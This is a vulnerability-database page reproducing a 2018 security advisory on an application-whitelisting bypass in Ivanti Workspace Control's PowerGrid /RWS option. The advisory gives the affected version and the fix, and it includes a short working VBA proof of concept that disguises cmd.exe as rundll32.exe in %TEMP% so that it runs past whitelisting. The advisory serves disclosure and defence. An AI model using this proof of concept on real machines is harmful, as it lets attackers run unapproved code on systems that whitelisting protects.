Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Ivanti Workspace Control Application PowerGrid RWS Whitelist Bypass

🗓️ 01 Oct 2018 00:00:00Reported by Yorick KosterType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 19 Views

Ivanti Workspace Control Application Whitelist Bypass via PowerGrid /RWS comman

Code
`------------------------------------------------------------------------  
Ivanti Workspace Control Application Whitelist bypass via PowerGrid /RWS  
command line argument  
------------------------------------------------------------------------  
Yorick Koster, August 2018  
  
------------------------------------------------------------------------  
Abstract  
------------------------------------------------------------------------  
It was found that the PowerGrid application will execute rundll32.exe  
from a relative path when it is started with the /RWS command line  
option. An attacker can abuse this issue to bypass Application  
Whitelisting in order to run arbitrary code on the target machine.  
  
------------------------------------------------------------------------  
Tested versions  
------------------------------------------------------------------------  
This issue was successfully verified on Ivanti Workspace Control version  
10.2.700.1.  
  
------------------------------------------------------------------------  
Fix  
------------------------------------------------------------------------  
This issue was resolved in Ivanti Workspace Control version 10.2.950.0.  
PowerGrid now uses the GetSystemDirectory() function to construct an  
absolute path to rundll32.exe.  
  
------------------------------------------------------------------------  
Details  
------------------------------------------------------------------------  
https://www.securify.nl/advisory/SFY20180801/ivanti-workspace-control-application-whitelist-bypass-via-powergrid-_rws-command-line-argument.html  
  
  
Proof of concept  
  
The VBA code below demonstrates this issue. The code tries to run cmd.exe from the %TEMP% folder.  
  
Private Sub PowerGridAWLBypass()  
On Error Resume Next  
Dim tmpPath, resPath, targetPath  
tmpPath = Environ("TEMP")  
resPath = Environ("RESPFDIR")  
targetPath = Environ("SystemRoot") & "\System32\cmd.exe"  
  
FileCopy targetPath, tmpPath & "\rundll32.exe"  
ChDir tmpPath  
Dim fso As Object  
Set fso = CreateObject("Scripting.FileSystemObject")  
Dim oFile As Object  
Set oFile = fso.CreateTextFile(tmpPath & "\foo.xml")  
oFile.WriteLine "<foo></foo>"  
oFile.Close  
Set fso = Nothing  
Set oFile = Nothing  
Shell resPath & "\pwrgrid.exe /RWS foo.xml", vbNormalFocus  
End Sub  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Oct 2018 00:00Current
0.1Low risk
Vulners AI Score0.1
ivanti workspace controlwhitelist bypasspowergridrws commandsecurity advisory
19